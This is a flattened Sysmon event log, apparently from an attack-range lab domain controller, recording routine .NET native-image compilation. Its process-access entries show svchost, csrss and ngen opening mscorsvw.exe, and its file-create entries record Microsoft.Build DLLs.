10341000x80000000000000007775Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.869{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007774Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.854{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007773Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.854{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007772Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.823{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9203-6005-6D03-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007771Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.807{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9203-6005-6D03-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007770Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:55.807{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9203-6005-6D03-00000000A301}3028C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007769Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:55.713{59A5CD1D-9202-6005-6C03-00000000A301}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8c4-0\Microsoft.Build.Engine.dll2021-01-18 13:49:55.713 10341000x80000000000000007782Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.401{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007781Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.385{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007780Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.385{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9204-6005-7003-00000000A301}2504C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007779Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.198{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9204-6005-6F03-00000000A301}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007778Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.182{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9204-6005-6F03-00000000A301}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007777Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:56.182{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9204-6005-6F03-00000000A301}4168C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007776Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:56.119{59A5CD1D-9203-6005-6E03-00000000A301}2116C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\844-0\Microsoft.Build.Framework.dll2021-01-18 13:49:56.119 10341000x80000000000000007799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.916{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7503-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.901{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7503-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.901{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7503-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.838{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7403-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.822{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7403-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.822{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7403-00000000A301}4336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.744{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7303-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.729{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7303-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.729{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9206-6005-7303-00000000A301}4756C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:49:58.651{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4a0-0\Microsoft.Build.Utilities.v4.0.dll2021-01-18 13:49:58.651 10341000x80000000000000007789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.276{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:49:58.260{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9206-6005-7203-00000000A301}1184C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 